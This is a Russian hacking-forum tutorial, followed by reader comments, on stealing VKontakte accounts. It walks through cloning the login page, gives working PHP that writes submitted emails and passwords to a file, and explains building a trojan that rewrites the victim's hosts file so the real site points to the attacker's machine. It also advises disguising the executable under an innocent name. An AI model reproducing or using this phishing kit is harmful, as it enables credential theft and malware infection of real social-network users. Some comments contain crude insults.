Нам потребуется:
-Установленный веб-сервер
-Фейк вконтакте
-s0VoK трой by s0
-Жертва
Все телодвижения будет происходить на локальном компе. Если же у вас есть дедик, можете использовать его(но если он у вас есть, то данная статья вам не нужна).
Устанаваливаем сервакУстанавливаем то что душе угодно.(чистый apache, Denwer..) Я предпочитаю - http://php.spb.ru/php/install_module.html Быстро ставится, и не захламляет систему. На этой странице есть описание как его установить.
Установили? Теперь нам нужен фейк главной страницы Вконтакте. Сделать его можно так:
-Заходим на vkontakte.ru
-В броузере выбираем Файл-Сохранить как...
-Тип файла - HTML-файл с изображениями
-Открываем полученый html файл в любом текстовом редакторе.
-Ищем строку <form
-Ищем параметр action
-Заменяем все что между ковычками action=" ", на login.php. В итоге имеем action="login.php"
-Ищем <span class="ncc"><a href="javascript:quick_login()">Вход</a></span>
-Меняем на <span class="ncc"><a href="javascript:login.submit()">Вход</a></span>
-Переименовываем его в index.php
Было <form method="post" name="login" id="login" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}"> Стало <form method="post" name="login" id="login" action="login.php" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
Теперь создаем файл login.php и в него пишем:
<?php $fname = "accounts.txt"; //Файл куда будем сохранять полученные данные //Получаем данные $email = $HTTP_POST_VARS['email']; $password = $HTTP_POST_VARS['pass']; $data = $email."-".$password."\r\n"; //Формируем строку для записи в файл $fp = fopen($fname, "a+") or die("Can not open file"); //Открываем файл fwrite($fp, $data); //Пишем в файл fclose($fp); //Закрываем файл Header("Location:vk_login.php"); //Перекидываем юзера на ошибку ?>
vk_login.php - это тот-же index.php, только с текстом о том, что логин-пароль не верны, либо что сервак вконтакте лежит, и пусть попробуют залогинится позже. В общем все на ваш вкус. Сохраняем все это, и кидаем в папку www1(если вы установили сервер от php.spb.ru) Запускаем apache.exe
Подготавливаем троя -Запускаем s0Vok.exe
-В поле IP Address указываем ваш внешний IP(узнать можно на 2ip.ru
-жмем Create Me
-Получаем файл run_me.exe, не зубудье его переименовать во что-нибудь нормальное(на подобии SuperRatioVKMaster.exe)
Теперь передаем жертве полученый exe файл, и ждем пока она зайдет к вам на страничку, и введет свои данные. Получить вы их сможете в файле accounts.txt
В архиве к статье:
s0VoK.exe - билдер троя
editme.bin - трой
Папка vk - то что мы делали выше, фейк вконтакте
Q - Почему мы используем наш компьютер, а не заливаем фейк на фрихостинг?
A - В файле hosts можно указать только IP адресс, таким образом мы не сможем сделать переадресацию на фрихостинг
Q - У меня ничего не работает
A - Се ля ви, ничем не могу помочь
Q - Как закинуть трояна жертве?
A - По проводам
Q - Жертва запустила файл, но у нее открывается оригинальный вконтакте.ру
A - Возможно у учетки жертвы нет прав на изменение файла hosts
© s0 18.01.2010
Уж больно всё заморочено =) да еще екзешник а так 4+
Уж больно всё заморочено
этапять!) да вы реальный хекер, я смотрю)
s0 вы совсем школотой стале \====
p.s. мр.со уже не торт
Фроклен, в осеку нас нойдите
2мр.Неизвестный_идентификатор:
идентифицируйтесь \=
Низачет.
проще троян подругрзить и зарулить всем парадом.
Также если "хекер" сидит за "роутером" или выходит в в нет через NAT,то хуйца словит замечательно.
без обид =)
Какой мего 0-дэй в s0Vok.exe =)))
Статья то на кого расчитана я так и не понял?
Да, действительно. Метод патча host не интересен. Все, даже маргинальные, файрваоллы/антивирусы палят этот метод.
Старо как мамонты, но к сожалению до сих пор эффективно.
все-таки нопесал) ща школьнеки ломануться хуярить страницы одноклассниц и дрочить на ЛС =\